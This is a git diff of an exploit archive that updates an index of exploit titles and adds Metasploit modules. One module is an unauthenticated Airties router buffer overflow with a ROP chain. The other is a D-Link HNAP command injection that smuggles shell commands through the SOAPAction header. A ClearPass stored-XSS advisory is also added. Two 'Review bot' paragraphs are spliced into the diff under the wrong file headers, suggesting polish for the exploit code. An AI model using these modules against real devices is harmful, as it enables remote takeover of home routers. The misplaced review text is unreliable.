diff --git a/files.csv b/files.csv
index 1978e9376..eb7739393 100755
--- a/files.csv
+++ b/files.csv
@@ -591,7 +591,7 @@ id,file,description,date,author,platform,type,port
 764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80
 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
 766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0
-767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21
+767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b - Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21
 769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0
 770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 - (.qtif) Image Parsing Vulnerability",2005-01-24,ATmaCA,windows,dos,0
 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
@@ -959,7 +959,7 @@ id,file,description,date,author,platform,type,port
 1157,platforms/cgi/webapps/1157.pl,"GTChat <= 0.95 Alpha Remote Denial of Service Exploit",2005-08-18,RusH,cgi,webapps,0
 1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0
 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0
-1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0
+1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0
 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0
 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0
 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0
@@ -1150,7 +1150,7 @@ id,file,description,date,author,platform,type,port
 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
-1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
+1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0
@@ -1458,7 +1458,7 @@ id,file,description,date,author,platform,type,port
 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0
 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306
 1742,platforms/linux/remote/1742.c,"MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
-1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
+1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
 1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0
 1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0
 1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0
@@ -2590,7 +2590,7 @@ id,file,description,date,author,platform,type,port
 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
-2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
+2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0
 2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability",2006-12-11,DeltahackingTEAM,php,webapps,0
@@ -9558,7 +9558,7 @@ id,file,description,date,author,platform,type,port
 10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0
 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0
 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
-10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21
+10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21
 10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability",2009-12-01,"cr4wl3r ",php,webapps,0
 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0
 10261,platforms/linux/webapps/10261.txt,"Dotdefender Remote Command Execution 3.8-5",2009-12-01,"John Dos",linux,webapps,80
@@ -15085,7 +15085,7 @@ id,file,description,date,author,platform,type,port
 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0
 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0
-17355,platforms/windows/remote/17355.rb,"GoldenFTP 4.70 PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21
+17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21
 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0
 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0
@@ -31760,7 +31760,7 @@ id,file,description,date,author,platform,type,port
 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - (.zip) Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0
 35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0
 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
-35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
+35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0
 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
@@ -33251,6 +33251,7 @@ id,file,description,date,author,platform,type,port
 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
 36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0
+37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,metasploit,linux,remote,52869
 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
@@ -33435,6 +33436,7 @@ id,file,description,date,author,platform,type,port
 37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
 37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
+37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,"Wad Deek",php,webapps,0
 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0
 37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0
@@ -33481,6 +33483,7 @@ id,file,description,date,author,platform,type,port
 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0
 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
+37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0
 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
@@ -33532,4 +33535,20 @@ id,file,description,date,author,platform,type,port
 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
+37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0
 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
+37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 'pagination_wp_facethum' Parameter Cross Site Scripting Vulnerability",2012-05-13,d3v1l,php,webapps,0
+37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
+37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
+37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
+37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
+37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 'uread.exe' Denial Of Service Vulnerability",2012-05-14,demonalex,windows,dos,0
+37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 'admin.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
+37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 'themes.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
+37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0
+37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build # 4172) - Buffer OverFlow PoC",2015-06-01,metacom,windows,remote,0
+37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload Vulnerability",2015-06-01,"nabil chris",php,webapps,0
+37167,platforms/linux/local/37167.c,"PonyOS <= 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0
+37168,platforms/linux/local/37168.txt,"PonyOS <= 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0
+37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,metasploit,hardware,remote,0
+37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0
diff --git a/platforms/hardware/remote/37170.rb b/platforms/hardware/remote/37170.rb
new file mode 100755
index 000000000..f6572c691
--- /dev/null
+++ b/platforms/hardware/remote/37170.rb
@@ -0,0 +1,151 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Airties login-cgi Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a remote buffer overflow vulnerability on several Airties routers.
+ The vulnerability exists in the handling of HTTP queries to the login cgi with long
+ redirect parametres. The vulnerability doesn't require authentication. This module has
+ been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
+ Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
+ Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
+ },
+ 'Author' =>
+ [
+ 'Batuhan Burakcin ', # discovered the vulnerability
+ 'Michael Messner ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux'],
+ 'Arch' => ARCH_MIPSBE,
+ 'References' =>
+ [
+ ['EDB', '36577'],
+ ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
+ ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
+ ],
+ 'Targets' =>
+ [
+ [ 'AirTies_Air5650v3TT_FW_1.0.2.0',
+ {
+ 'Offset' => 359,
+ 'LibcBase' => 0x2aad1000,
+ 'RestoreReg' => 0x0003FE20, # restore s-registers
+ 'System' => 0x0003edff, # address of system-1
+ 'CalcSystem' => 0x000111EC, # calculate the correct address of system
+ 'CallSystem' => 0x00041C10, # call our system
+ 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Mar 31 2015',
+ 'DefaultTarget' => 0))
+
+ deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => '/cgi-bin/login',
+ 'method' => 'GET'
+ })
+
+ if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
+ return Exploit::CheckCode::Detected
+ end
+ rescue ::Rex::ConnectionError
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+ def exploit
+ print_status("#{peer} - Accessing the vulnerable URL...")
+
+ unless check == Exploit::CheckCode::Detected
+ fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+ end
+
+ print_status("#{peer} - Exploiting...")
+ execute_cmdstager(
+ :flavour => :echo,
+ :linemax => 100
+ )
+ end
+
+ def prepare_shellcode(cmd)
+ shellcode = rand_text_alpha_upper(target['Offset']) # padding
+ shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values
+
+ # 0003FE20 lw $ra, 0x48+var_4($sp)
+ # 0003FE24 lw $s7, 0x48+var_8($sp)
+ # 0003FE28 lw $s6, 0x48+var_C($sp)
+ # 0003FE2C lw $s5, 0x48+var_10($sp)
+ # 0003FE30 lw $s4, 0x48+var_14($sp)
+ # 0003FE34 lw $s3, 0x48+var_18($sp)
+ # 0003FE38 lw $s2, 0x48+var_1C($sp)
+ # 0003FE3C lw $s1, 0x48+var_20($sp)
+ # 0003FE40 lw $s0, 0x48+var_24($sp)
+ # 0003FE44 jr $ra
+ # 0003FE48 addiu $sp, 0x48
+
+ shellcode << rand_text_alpha_upper(36) # padding
+ shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1
+ shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4
+ shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system
+
+ # 00041C10 move $t9, $s0
+ # 00041C14 jalr $t9
+ # 00041C18 nop
+
+ shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7
+ shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parametre for call to system
+
+ # 000215B8 addiu $a0, $sp, 0x20
+ # 000215BC lw $ra, 0x1C($sp)
+ # 000215C0 jr $ra
+ # 000215C4 addiu $sp, 0x20
+
+ shellcode << rand_text_alpha_upper(28) # padding
+ shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address)
+
+ # 000111EC move $t9, $s5
+ # 000111F0 jalr $t9
+ # 000111F4 addiu $s0, 1
+
+ shellcode << cmd
+ end
+
+ def execute_command(cmd, opts)
+ shellcode = prepare_shellcode(cmd)
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => '/cgi-bin/login',
+ 'encode_params' => false,
+ 'vars_post' => {
+ 'redirect' => shellcode,
+ 'user' => rand_text_alpha(5),
+ 'password' => rand_text_alpha(8)
+ }
+ })
+ return res
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/hardware/remote/37171.rb b/platforms/hardware/remote/37171.rb
new file mode 100755
index 000000000..b1dac5c16
--- /dev/null
+++ b/platforms/hardware/remote/37171.rb
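Review bot: The `Targets` table carries address constants for the AirTies_Air5650v3TT_FW_1.0.2.0 image only, while the `Description` names eleven further models as "reported as vulnerable" without saying that none of them is covered by the shipped target; a sentence such as `Only the Air5650v3TT 1.0.2.0 firmware has a target entry; the other listed models are untested by this module.` would stop readers taking that list as supported targets. Relatedly, `check` returns `Detected` whenever `/cgi-bin/login` answers with the `login.html?ErrorCode=2` redirect, which a fixed firmware would presumably answer identically, so a one-line comment in `check` noting that this is a presence test rather than a vulnerability test (hence `Detected`, not `Vulnerable`) is worth adding. The disassembly listings in `prepare_shellcode` document the gadget chain well; the `Targets` hash would benefit from the same care by stating which firmware image the `LibcBase` value was taken from.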
@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
+ 'Description' => %q{
+ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
+ interface. Since it is a blind OS command injection vulnerability, there is no
+ output for the executed command. This module has been tested on a DIR-645 device.
+ The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
+ DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
+ DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+ },
+ 'Author' =>
+ [
+ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
+ 'Craig Heffner', # independent Vulnerability discovery on different other routers
+ 'Michael Messner ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
+ ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
+ ],
+ 'DisclosureDate' => 'Feb 13 2015',
+ 'Privileged' => true,
+ 'Platform' => 'linux',
+ 'Targets' =>
+ [
+ [ 'MIPS Little Endian',
+ {
+ 'Arch' => ARCH_MIPSLE
+ }
+ ],
+ [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
+ {
+ 'Arch' => ARCH_MIPSBE
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
+ end
+
+ def check
+ uri = '/HNAP1/'
+ soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
+
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'GET',
+ 'headers' => {
+ 'SOAPAction' => soap_action,
+ }
+ })
+
+ if res && [200].include?(res.code) && res.body =~ /D-Link/
+ return Exploit::CheckCode::Detected
+ end
+ rescue ::Rex::ConnectionError
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+ def exploit
+ print_status("#{peer} - Trying to access the device ...")
+
+ unless check == Exploit::CheckCode::Detected
+ fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+ end
+
+ print_status("#{peer} - Exploiting...")
+
+ execute_cmdstager(
+ :flavour => :echo,
+ :linemax => 200,
+ :temp => ''
+ )
+ end
+
+ def execute_command(cmd, opts)
+
+ uri = '/HNAP1/'
+
+ # we can not use / in our command so we need to use a little trick
+ cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
+ soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
+
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'GET',
+ 'headers' => {
+ 'SOAPAction' => soap_action,
+ }
+ }, 3)
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37172.txt b/platforms/hardware/webapps/37172.txt
new file mode 100755
index 000000000..5850b9782
--- /dev/null
+++ b/platforms/hardware/webapps/37172.txt
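Review bot: In `execute_command`, `res` is assigned from `send_request_cgi(..., 3)` but never read or returned, whereas the sibling module added in this same commit (37170.rb) returns the response from its `execute_command`; either drop the assignment or add `return res` so the two modules behave alike. In `check`, `[200].include?(res.code)` wraps a single value and reads more directly as `res.code == 200`, and both `'headers'` hashes carry a trailing comma after `'SOAPAction' => soap_action,` that the rest of the file does not use. The description says only the DIR-645 was tested; a short comment on the `'MIPS Little Endian'` target naming it as the tested device would tie the two together for anyone extending the target list.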
@@ -0,0 +1,87 @@
+===============================================================================
+ title: ClearPass Policy Manager Stored XSS
+ case id: CM-2014-01
+ product: Aruba ClearPass Policy Manager
+ vulnerability type: Stored cross-site script
+ severity: Medium
+ found: 2014-11-24
+ by: Cristiano Maruti (@cmaruti)
+===============================================================================
+
+[EXECUTIVE SUMMARY]
+
+ The analysis discovered a stored cross site scripting vulnerability (OWASP
+ OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated
+ user is able to inject arbitrary script through the login form that may be
+ rendered and triggered later if a privileged authenticated user reviews the
+ access audit record. An attack can use the aforementioned vulnerability to
+ effectively steal session cookies of privileged logged on users.
+
+[VULNERABLE VERSIONS]
+
+The following version of the Aruba ClearPass Policy Manager was affected by the
+vulnerability; previous versions may be vulnerable as well:
+- Aruba ClearPass Policy Manager 6.4
+
+[TECHNICAL DETAILS]
+
+It is possible to reproduce the vulnerability following these steps:
+1. Open the login page with your browser;
+2. Put the "><" string in the username field
+and fill in the password field with a value of your choice;
+3. Submit the form;
+4. Login to the application with an administrative user:
+5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload.
+
+Below a full transcript of the HTTP request used to raise the vulnerability
+HTTP Request
+-------------------------------------------------------------------------------
+POST /tips/tipsLoginSubmit.action HTTP/1.1
+Host: 10.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.1/tips/tipsLoginSubmit.action
+Cookie:
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 58
+
+username="><"&password=test
+-------------------------------------------------------------------------------
+
+A copy of the report with technical details about the vulnerability I have
+identified is available at:
+https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf
+
+
+[VULNERABILITY REFERENCE]
+
+The following CVE ID was allocated to track the vulnerability:
+- CVE-2015-1389: Stored cross-site scripting (XSS)
+
+[DISCLOSURE TIMELINE]
+
+2014-11-24 Vulnerability submitted to vendor through the Bugcrowd
+bounty program.
+2014-12-09 Vendor acknowledged the problem.
+2014-12-10 Researcher requested to publicly disclose the issue.
+2015-02-16 Vendor released a fix for the reported issue.
+2015-02-09 Vendor asked to hold-on for the public disclosure.
+2015-02-22 Vendor postponed the public disclosure date
+2015-02-22 Public coordinated disclosure.
+
+
+
+[SOLUTION]
+
+Aruba release an update to fix the vulnerability (ClearPass 6.5 or
+later). Please see
+the below link for further information released by the vendor:
+- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt
+
+
+[REPORT URL]
+
